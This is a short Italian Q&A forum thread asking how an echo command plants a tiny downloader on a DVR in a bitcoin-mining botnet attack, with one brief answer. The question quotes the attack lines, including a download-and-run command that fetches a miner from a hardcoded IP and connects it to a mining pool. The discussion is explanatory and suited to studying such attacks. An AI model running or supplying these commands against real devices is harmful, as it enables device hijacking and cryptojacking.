DVR compromettenti per diventare bot bitcoin mining [duplicato]

0

Ho letto questo articolo , a proposito di un exploit che altera un DVR per diventare un "bot bitcoin mining".

Il cuore dell'attacco è inviare un binario usando solo i comandi echo al dispositivo, che agisce come un wget banale (il dispositivo non ha wget da solo):

echo -ne '\x00\x00\x00\x2f\x00\x00\x00\x1a\x00\x00 \x00\x00\x00\x00\x00\x05\x00\x00\x00\x00 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00 \x00\x31\x00\x00\x00\x00\x00 \x00\x00\x2a\x00\x00\x00\x1b\x00\x00\x00 \x14\x00\x00\x00' >> /var/run/rand0-btcminer-arm

Questo binario viene quindi utilizzato per ottenere il bitcoin mining sw stesso

./rand0-btcminer-arm http://107.178.66.153/btcminer-arm && \
chmod u+x btcminer-arm && ./btcminer-arm -B -o \
stratum+tcp://204.124.183.242:3333 -t 4 -q && echo -ne '\x64\x6f\x6e\x65'

Qualcuno può spiegare cosa fa esattamente il comando echo e come funziona? Può davvero pochi byte rappresentare un "wget" funzionante?

    
posta Martin Vegter 06.05.2014 - 10:24
fonte

1 risposta

0

L'eco è uno shellcode che viene eseguito sul DVR. Memorizza un piccolo file che è un programma che si comporta come wget. Questo programma viene quindi chiamato per recuperare un altro (il programma di mining) che viene eseguito.

Scusa se mi sono sbagliato. Come indicato nei commenti, guarda questa discussione Una versione minuscola di wget (51 byte?)

    
risposta data 06.05.2014 - 11:09
fonte

Leggi altre domande sui tag